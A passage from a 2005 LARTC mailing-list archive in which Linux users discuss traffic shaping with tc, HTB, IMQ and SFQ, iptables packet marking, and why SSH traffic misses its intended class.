bk. The patchset has gone in around rc1-bk3-5" Well issue 1 is that in iproute-latest (as well as the one released yesterday) the output of: tc show filter dev eth0 parent ffff:" and change/replace DO NOT WORK. ----------------------------------------------------------------------- filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0 match 0a010102/ffffffff at 12 police 0x4 rate 20000bit burst 2559b mtu 2kb action reclassify ref -10352222812 bind -8666697856 on the bk version (latest changeLog entry 18-1-2005) as you suggested the output is NOT VERBOSE ENOUGH to see if all parameters are working, but change/replace SEEM TO BE WORKING. Heres the output: filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0 match 0a010102/ffffffff at 12 ISSUE 2 ------- In lots of computers i try to install iproute2 i get an error about db_185.h missing . Issuing a simple apt-get install libdb4.1-dev resolves the problem and the arpd compiles perfectly. Maybe consider documenting that somewhere. --- Thomas Graf wrote: > * Antonios Chalkiopoulos > <200501241402.08307.alg0@iit.demokritos.gr> > 2005-01-24 14:02 > > > > I am wondering whether the commands 'tc filter > change' and 'tc filter replace' > > are working. Googling around revealed a few emails > on the LARTC stating that > > unfoirtunately they do not work. A quick check > showed that they are still not > > implemented (properly). > > Some propose a solution to build a second tree of > filters and apply the 2nd > > one when a need for it arises. Howver how can > someone achive the above trick. > > All classifiers except rsvp are changeable in the > latest bk. The > patchset has gone in around rc1-bk3-5. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > http://lartc.org/ > __________________________________ Do you Yahoo!? Take Yahoo! Mail with you! Get it on your mobile phone. http://mobile.yahoo.com/maildemo From andy.furniss@dsl.pipex.com Tue Jan 25 12:23:06 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 25 Jan 2005 12:23:06 +0000 Subject: [LARTC] Htb, imq and sfq traffic shaping In-Reply-To: <20050124150857.7d530d34@drak.aard.net> References: <20050124150857.7d530d34@drak.aard.net> Message-ID: <41F63A2A.6090604@dsl.pipex.com> Ixen Gerthannes wrote: > Hello, I wrote a simple traffic shaping script (below) that should > have allowed me to shape my internet traffic a bit (ppp0 - adsl > 128kbit/64kbit; local interface eth0). The script works only > partially - the speed is being limited but too much. Without running > this script my download rate is about 10kBytes (with second computer > also downloading at about 6kBytes). After running it my download > speed decreases to about 1..2kBytes and so the second computer. Could > you tell me what have I done wrong ? > > Thank you for replies. Ixen > > -------------- My configuration: If you are shaping on and using PC1 and forwarding traffic for PC2 then you only need one IMQ. You need to send all inbound on ppp0 to it in PREROUTING. Shape egress directly on ppp0. Traffic from the shaping PC will have ppp0s address not eth0s, you need to mark local addresses in postrouting mangle for the queues on ppp0. IMQ needs to be set to hook after nat in prerouting. This may be the default AB? To filter inbound local (denatted) ip addresses you can't mark with iptables you need to use tc filters. Remember traffic to/from the shaping PC over ppp0 will have ppp0s address. You need to back off from 128/64 - maybe 100/50, it depends what you want to shape for. There are other tweaks if you really care about latency. You need to sacrifice downstream bandwidth - and upstream unless you are prepared to find link overheads and tweak/patch. Andy. From andy.furniss@dsl.pipex.com Tue Jan 25 12:32:17 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 25 Jan 2005 12:32:17 +0000 Subject: [LARTC] tail and head drop qdiscs In-Reply-To: <1106170939.10019.23.camel@localhost.localdomain> References: <1106170939.10019.23.camel@localhost.localdomain> Message-ID: <41F63C51.9050207@dsl.pipex.com> vincent perrier wrote: > I think that there are no qdiscs that permit to drop the oldest > frame of a queue when this queue is full, but I would like to > be wrong: > > bfifo drops arriving frames when the max queue length is reached. > > red also drops arriving frames in a more elaborate fashion, with > a drop probability that increases above a limit and becomes > a drop certitude when the max queue length is reached. > > sfq drops "fairly", it piles frames with same (ip source, ip dest, > port source and port dest) and drops a frame from the > biggest pile to favour the smaller flows. > > But I cannot find the qdisc that reacts like a bfifo or red qdisc > but drops the oldest message of the queue when a drop is needed. > > Even better: a qdisc with an autodestruct algorithm for each > frame in the queue that would garantee the "freshness" of > each frame coming out. > > If you know of such qdiscs, please share. > What sort of thing do you want this for? I made a version of esfq head drop for use in specific circumstances. The only other thing I thought head drop generally could be usefull for is a game server, but then maybe a policer would be better than a queue WRT latency. Andy. From andy.furniss@dsl.pipex.com Tue Jan 25 12:41:31 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 25 Jan 2005 12:41:31 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <200501191657.15767.rio@martin.mu> References: <200501191657.15767.rio@martin.mu> Message-ID: <41F63E7B.30202@dsl.pipex.com> Rio Martin. wrote: > On Wed, 19 Jan 2005 09:19:58 +0100 Tóth Nándor wrote: > Rio Martin. wrote: > >>>Folks, >>>I am a little bit confuse in how to put these packets into correct mangle >>>table for traffic shaping. >>>This is what i ve planned to do: >>> >>>- - - - :eth0 [ LINUX-BOX ] eth1: - - - - >>> >>>Let say: >>>eth0: 220.100.1.1 >>>eth1: 192.168.1.1 >>>eth1:1 192.168.1.2 >>> >>>192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. >>>I put every packets coming from internet (eth0) this way: >>># iptables -t mangle -I PREROUTING -i eth0 .. * * * * >>> >>>But what if i would like to do the same way with ip 192.168.1.1 and >>>192.168.1.2 ? How to put the packets in correct mangle table? >> >>You can only shape traffic leaving your interface. You have to shape the >>incoming traffic at interface eth1, the outgoing traffic at interface eth0. >>This site is great for learning: >>http://www.knowplace.org/shaper/qdisc.html#egress >>I found to use iptables+CLASSIFY method the easiest way to classify packets. >> >>Your question is a little dizzy... > > > Oopss sorry then :)) > > Actually, there is squid proxy running in my box, with those two private IPs > (192.168.1.1 & 192.168.1.2) > Both get natted to 220.100.1.1. Is there only one proxy running? > > I need to shape incoming traffic to both of these ips but i am affraid i have > to face that i am not able to shape traffic which is generate from this box > unless those two IPs were outside the box. Maybe true - maybe not you would need to test with imq. There is also a kernel option to do with nat of local connections. > > If i have one more public IP than i should not so much worry about, cause i > can shape it using IMQ. > > So any other ideas maybe? i'm thinkin just in case IMQ would help .. Possibly - but I don't understand your setup or what you want to shape :-) > Thanks for the info u gave anyway.. > > - Rio.Martin - > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From jacob martinson Tue Jan 25 19:18:51 2005 From: jacob martinson (jacob martinson) Date: Tue, 25 Jan 2005 13:18:51 -0600 Subject: [LARTC] graphing Message-ID: <5b7479590501251118bee421a@mail.gmail.com> Does anyone know what Martin used to generate the graphs in the HTB user guide? http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm Thanks! -Jacob From Andreas.Klauer@metamorpher.de Tue Jan 25 19:35:28 2005 From: Andreas.Klauer@metamorpher.de (Andreas Klauer) Date: Tue, 25 Jan 2005 20:35:28 +0100 Subject: [LARTC] graphing In-Reply-To: <5b7479590501251118bee421a@mail.gmail.com> References: <5b7479590501251118bee421a@mail.gmail.com> Message-ID: <200501252035.29023.Andreas.Klauer@metamorpher.de> On Tuesday 25 January 2005 20:18, jacob martinson wrote: > Does anyone know what Martin used to generate the graphs in the HTB user > guide? Do you mean the class tree graphs? You can use GraphViz to generate those, maybe with the help of a script like http://www.metamorpher.de/files/tc-graph.pl which creates graphs (together with GraphViz 'dot') like these http://www.metamorpher.de/files/fairnat.png (big!). If you mean the statistic graphs, maybe these were done with RRDTool or similar. There are scripts that create this kind of graph as well, but I haven't got an example URL handy. Maybe someone else on this list can provide one. HTH Andreas From stef.coene@docum.org Tue Jan 25 19:40:31 2005 From: stef.coene@docum.org (Stef Coene) Date: Tue, 25 Jan 2005 20:40:31 +0100 Subject: [LARTC] graphing In-Reply-To: <5b7479590501251118bee421a@mail.gmail.com> References: <5b7479590501251118bee421a@mail.gmail.com> Message-ID: <200501252040.31194.stef.coene@docum.org> On Tuesday 25 January 2005 20:18, jacob martinson wrote: > Does anyone know what Martin used to generate the graphs in the HTB user > guide? Yep, it's a perl script to process the counters and I gnuplot to create the graph. I used the same scripts to create my graphs, so I downloaded it somewhere from his site. If you can't find the scripts, let me know and I will try to find mine. Stef From vincent-perrier@club-internet.fr Tue Jan 25 19:41:49 2005 From: vincent-perrier@club-internet.fr (vincent perrier) Date: Tue, 25 Jan 2005 20:41:49 +0100 Subject: [LARTC] tail and head drop qdiscs In-Reply-To: <41F63C51.9050207@dsl.pipex.com> References: <1106170939.10019.23.camel@localhost.localdomain> <41F63C51.9050207@dsl.pipex.com> Message-ID: <1106682109.5611.9.camel@localhost.localdomain> > vincent perrier wrote: > > I think that there are no qdiscs that permit to drop the oldest > > frame of a queue when this queue is full ... > What sort of thing do you want this for? > ... > Andy. > Very low rate (satellite links for example) and strict priority can lead to messages waiting for a chance to be transmitted and getting old in low prio queues as higher priority messages take all the bandwidth. Vincent. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From vincent-perrier@club-internet.fr Tue Jan 25 19:56:59 2005 From: vincent-perrier@club-internet.fr (vincent perrier) Date: Tue, 25 Jan 2005 20:56:59 +0100 Subject: [LARTC] graphing In-Reply-To: <5b7479590501251118bee421a@mail.gmail.com> References: <5b7479590501251118bee421a@mail.gmail.com> Message-ID: <1106683018.5736.4.camel@localhost.localdomain> > Does anyone know what Martin used to generate the graphs in the HTB user guide? > > http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm > > Thanks! > > -Jacob I think Martin used the following tool to transmit frames: http://luxik.cdi.cz/~devik/qos/ethloop/ and I suppose he used gnuplot to graph, I also did some graphs on HTB visible at http://rawsoft.org with ethloop and gnuplot. Vincent. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From rob0@gmx.co.uk Wed Jan 26 08:15:05 2005 From: rob0@gmx.co.uk (/dev/rob0) Date: Wed, 26 Jan 2005 02:15:05 -0600 Subject: [LARTC] Connection tracking flush In-Reply-To: <1105546032.5000.3.camel@WLESS> References: <1105546032.5000.3.camel@WLESS> Message-ID: <200501260215.05729.rob0@gmx.co.uk> On Wednesday 12 January 2005 10:07, Mpourtounis Dimitris wrote: > Is there a way i can flush the connection tracking on my box (after a > restart in iptables)? > If the connection tracking module is unloaded and reloaded, my job > will be accomplished i think. Only way I know of, other than reboot. > The bad thing is i want this tracking > module to exist in kernel code and not loaded as a module. Why? What's the advantage in that? Maybe if it's a tiny embedded device, but in that case the reboot options sounds viable. -- mail to this address is discarded unless "/dev/rob0" or "not-spam" is in Subject: header From junk@yxy.mine.nu Wed Jan 26 10:51:41 2005 From: junk@yxy.mine.nu (junk@yxy.mine.nu) Date: Wed, 26 Jan 2005 12:51:41 +0200 (IST) Subject: [LARTC] Controlling Outbound traffic...alternative to dsl_qos_queue Message-ID: <1059.192.168.1.2.1106736701@yxy.mine.nu> Hi , this probably was asked many times before , but here it goes.. Until now i was using dsl_qos_queue - http://www.sonicspike.net/software/ Which limits outbound traffic and does packet priorites with iptables using MARKed packets.. works very well , I run a ftpserver + webserver so it's usefull to set these 2 with lowest priority and my multiplayer gaming running on certain UDP ports with the highest priority. The problem now is that dsl_qos_queue adds a QUEUE Target to the POSTROUTING chain for reading the MARKed packets , and i recently added a -j ROUTE target for my load balancing configuration to this chain: /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 0 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 1 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 2 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 3 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 4 -j ROUTE --oif ppp0 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 5 -j ROUTE --oif ppp0 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 6 -j ROUTE --oif ppp0 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 7 -j ROUTE --oif ppp0 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 8 -j ROUTE --oif ppp0 since -j ROUTE is a terminating target it never reaches the QUEUE target.. i need an alternative to dsl_qos_queue i just want to effectivly control only once interface ppp0 it's a cable connection using a l2tp tunnel to the ISP , 1500/128kbit . i know nothing about burts , queue buckets whatever , need a working example.. i have all QoS modules compiled and whatever necessary tools From beatlelittle@yahoo.com.cn Wed Jan 26 10:56:24 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Wed, 26 Jan 2005 18:56:24 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! Message-ID: <20050126105624.21731.qmail@web15505.mail.cnb.yahoo.com> --0-918797084-1106736984=:17715 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit I'm a new comer. I have problems using tc+htb. I run the following commands, and expect outgoing ssh flow goes into 1:11. But actually it goes into default 12. What's wrong? tc qdisc add dev eth0 root handle 1: htb default 12 tc class add dev eth0 parent 1: classid 1:1 htb rate 1000kbit ceil 2000kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 100kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 100kbit prio 1 tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 20 iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 Thanks a lot! CcM --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-918797084-1106736984=:17715 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
I'm a new comer. I have problems using tc+htb. I run the following commands, and expect outgoing ssh flow goes into 1:11. But actually it goes into default 12. What's wrong?
 
tc qdisc add dev eth0 root handle 1: htb default 12
 tc class add dev eth0 parent 1: classid 1:1 htb rate 1000kbit ceil 2000kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 100kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 100kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
 
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 20
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN
 
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
Thanks a lot!
CcM


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-918797084-1106736984=:17715-- From rio@martin.mu Wed Jan 26 18:04:53 2005 From: rio@martin.mu (Rio Martin.) Date: Wed, 26 Jan 2005 18:04:53 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <41F63E7B.30202@dsl.pipex.com> References: <200501191657.15767.rio@martin.mu> <41F63E7B.30202@dsl.pipex.com> Message-ID: <200501261804.53584.rio@martin.mu> On Tuesday 25 January 2005 12:41, Andy Furniss wrote: > Is there only one proxy running? > > I need to shape incoming traffic to both of these ips but i am affraid i > > have to face that i am not able to shape traffic which is generate from > > this box unless those two IPs were outside the box. > Maybe true - maybe not you would need to test with imq. > There is also a kernel option to do with nat of local connections. > > If i have one more public IP than i should not so much worry about, cause > > i can shape it using IMQ. I'll make it simple for you as possible. i have linux box which have eth0 220.1.1.1 as primary ip and aliasses: eth0:1 192.168.1.1 , eth0:1 192.168.1.2 Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1 OKay, now my question is: How do i manage and limit traffic generated from those ips (192.168.1.1 & 192.168.1.2) ? Not just traffic outside, but traffic coming to those ips from Internet. I found it so difficult because traffic coming from internet to eth0 will be using 220.1.1.1 not 192.168.x.x Thanks .. - Rio.Martin - From beatlelittle@yahoo.com.cn Wed Jan 26 11:06:45 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Wed, 26 Jan 2005 19:06:45 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! Message-ID: <20050126110645.72318.qmail@web15504.mail.cnb.yahoo.com> --0-209373516-1106737605=:67202 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit I'm a new comer. I have problems using tc+htb. I run the following commands, and expect outgoing ssh flow goes into 1:11. But actually it goes into default 12. What's wrong? tc qdisc add dev eth0 root handle 1: htb default 12 tc class add dev eth0 parent 1: classid 1:1 htb rate 1000kbit ceil 2000kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 100kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 100kbit prio 1 tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 20 iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 Thanks a lot! CcM --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-209373516-1106737605=:67202 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
I'm a new comer. I have problems using tc+htb. I run the following commands, and expect outgoing ssh flow goes into 1:11. But actually it goes into default 12. What's wrong?
 
tc qdisc add dev eth0 root handle 1: htb default 12
 tc class add dev eth0 parent 1: classid 1:1 htb rate 1000kbit ceil 2000kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 100kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 100kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
 
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 20
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN
 
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
Thanks a lot!
CcM


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-209373516-1106737605=:67202-- From beatlelittle@yahoo.com.cn Wed Jan 26 11:45:28 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Wed, 26 Jan 2005 19:45:28 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: Message-ID: <20050126114528.75231.qmail@web15504.mail.cnb.yahoo.com> --0-1327050722-1106739928=:74122 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit Sorry, I did not make it clear. The machine I want to do traffic control is a server which run sshd. I think it should be --sport. I also tried to use : iptables -t mangle -A PREROUTING -m tos --tos Minimize-Delay -j MARK --set-mark 20 the ssh traffice still goes into default 12. following is the evidence: bash#tc -s -d class show dev eth0 class htb 1:11 parent 1:1 leaf 111: prio 1 quantum 1000 rate 10Kbit ceil 10Kbit burst 1611b/8 mpu 0b cburst 1611b/8 mpu 0b level 0 Sent 0 bytes 0 pkts (dropped 0, overlimits 0) lended: 0 borrowed: 0 giants: 0 tokens: 1031680 ctokens: 1031680 class htb 1:1 root rate 1000Kbit ceil 2000Kbit burst 2879b/8 mpu 0b cburst 4159b/8 mpu 0b level 7 Sent 21163 bytes 149 pkts (dropped 0, overlimits 0) rate 5bps lended: 0 borrowed: 0 giants: 0 tokens: 17818 ctokens: 13004 class htb 1:13 parent 1:1 leaf 113: prio 1 quantum 1280 rate 100Kbit ceil 100Kbit burst 1727b/8 mpu 0b cburst 1727b/8 mpu 0b level 0 Sent 0 bytes 0 pkts (dropped 0, overlimits 0) lended: 0 borrowed: 0 giants: 0 tokens: 110592 ctokens: 110592 class htb 1:12 parent 1:1 leaf 112: prio 1 quantum 10240 rate 800Kbit ceil 1600Kbit burst 2623b/8 mpu 0b cburst 3647b/8 mpu 0b level 0 Sent 21163 bytes 149 pkts (dropped 0, overlimits 0) rate 5bps lended: 149 borrowed: 0 giants: 0 tokens: 20225 ctokens: 14208 Mika Hirvonen wrote: On Wed, 26 Jan 2005 18:56:24 +0800 (CST), CcM wrote: > I'm a new comer. I have problems using tc+htb. I run the following commands, > and expect outgoing ssh flow goes into 1:11. But actually it goes into > default 12. What's wrong? > iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark > 20 > iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN These two lines should use --dport instead of --sport. The source port is random. AFAIR OpenSSH (and probably others) automatically mark their packets with proper ToS flags, so you should considering using those instead of port numbers. If you classify ssh traffic by port number only, SSH file transfers (scp and sftp) end up in the same class as interactive traffic. -- Mika Hirvonen --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1327050722-1106739928=:74122 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
Sorry, I did not make it clear. The machine I want to do traffic control is a server which run sshd. I think it should be --sport.
I also tried to use :
        iptables -t mangle -A PREROUTING -m tos --tos Minimize-Delay -j MARK --set-mark 20
the ssh traffice still goes into default 12.
 
following is the evidence:
bash#tc -s -d class show dev eth0

class htb 1:11 parent 1:1 leaf 111: prio 1 quantum 1000 rate 10Kbit ceil 10Kbit burst 1611b/8 mpu 0b cburst 1611b/8 mpu 0b level 0
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
 lended: 0 borrowed: 0 giants: 0
 tokens: 1031680 ctokens: 1031680
 
class htb 1:1 root rate 1000Kbit ceil 2000Kbit burst 2879b/8 mpu 0b cburst 4159b/8 mpu 0b level 7
 Sent 21163 bytes 149 pkts (dropped 0, overlimits 0)
 rate 5bps
 lended: 0 borrowed: 0 giants: 0
 tokens: 17818 ctokens: 13004
 
class htb 1:13 parent 1:1 leaf 113: prio 1 quantum 1280 rate 100Kbit ceil 100Kbit burst 1727b/8 mpu 0b cburst 1727b/8 mpu 0b level 0
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
 lended: 0 borrowed: 0 giants: 0
 tokens: 110592 ctokens: 110592
 
class htb 1:12 parent 1:1 leaf 112: prio 1 quantum 10240 rate 800Kbit ceil 1600Kbit burst 2623b/8 mpu 0b cburst 3647b/8 mpu 0b level 0
 Sent 21163 bytes 149 pkts (dropped 0, overlimits 0)
 rate 5bps
 lended: 149 borrowed: 0 giants: 0
 tokens: 20225 ctokens: 14208


Mika Hirvonen <hirvox@gmail.com> wrote:
On Wed, 26 Jan 2005 18:56:24 +0800 (CST), CcM wrote:
> I'm a new comer. I have problems using tc+htb. I run the following commands,
> and expect outgoing ssh flow goes into 1:11. But actually it goes into
> default 12. What's wrong?

> iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark
> 20
> iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN

These two lines should use --dport instead of --sport. The source port
is random.

AFAIR OpenSSH (and probably others) automatically mark their packets
with proper ToS flags, so you should considering using those instead
of port numbers. If you classify ssh traffic by port number only, SSH
file transfers (scp and sftp) end up in the same class as interactive
traffic.


--
Mika Hirvonen


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1327050722-1106739928=:74122-- From util@deuroconsult.ro Wed Jan 26 11:58:34 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 26 Jan 2005 13:58:34 +0200 (EET) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: <20050126114528.75231.qmail@web15504.mail.cnb.yahoo.com> References: <20050126114528.75231.qmail@web15504.mail.cnb.yahoo.com> Message-ID: Use: iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ --set-mark 20 --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From beatlelittle@yahoo.com.cn Wed Jan 26 12:20:50 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Wed, 26 Jan 2005 20:20:50 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: Message-ID: <20050126122050.4478.qmail@web15502.mail.cnb.yahoo.com> --0-932001211-1106742050=:92945 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit It does work! Thanks! But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? "Catalin(ux aka Dino) BOIE" wrote: Use: iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ --set-mark 20 --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ _______________________________________________ LARTC mailing list / LARTC@mailman.ds9a.nl http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-932001211-1106742050=:92945 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
It does work! Thanks!
But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? 

"Catalin(ux aka Dino) BOIE" <util@deuroconsult.ro> wrote:
Use:
iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
--set-mark 20

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/
_______________________________________________
LARTC mailing list / LARTC@mailman.ds9a.nl
http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-932001211-1106742050=:92945-- From util@deuroconsult.ro Wed Jan 26 12:42:14 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 26 Jan 2005 14:42:14 +0200 (EET) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: <20050126122050.4478.qmail@web15502.mail.cnb.yahoo.com> References: <20050126122050.4478.qmail@web15502.mail.cnb.yahoo.com> Message-ID: This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. ---1646943047-351355836-1106743334=:11539 Content-Type: TEXT/PLAIN; charset=iso-8859-1; format=flowed Content-Transfer-Encoding: 8BIT On Wed, 26 Jan 2005, CcM wrote: > It does work! Thanks! > But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? > > "Catalin(ux aka Dino) BOIE" wrote: > Use: > iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ > --set-mark 20 Because local generated packets doesn't go through PREROUTING. But, best is to use OUTPUT. > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > > > --------------------------------- > Do You Yahoo!? > ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ---1646943047-351355836-1106743334=:11539-- From andre.correa@pobox.com Wed Jan 26 16:18:16 2005 From: andre.correa@pobox.com (Andre Correa) Date: Wed, 26 Jan 2005 14:18:16 -0200 Subject: [LARTC] Htb, imq and sfq traffic shaping In-Reply-To: <20050124150857.7d530d34@drak.aard.net> References: <20050124150857.7d530d34@drak.aard.net> Message-ID: <41F7C2C8.3000308@pobox.com> You shouldn't point your filters to the sfq qdisc, point then to the leaf classes that have sfq qdiscs as child. Andre Ixen 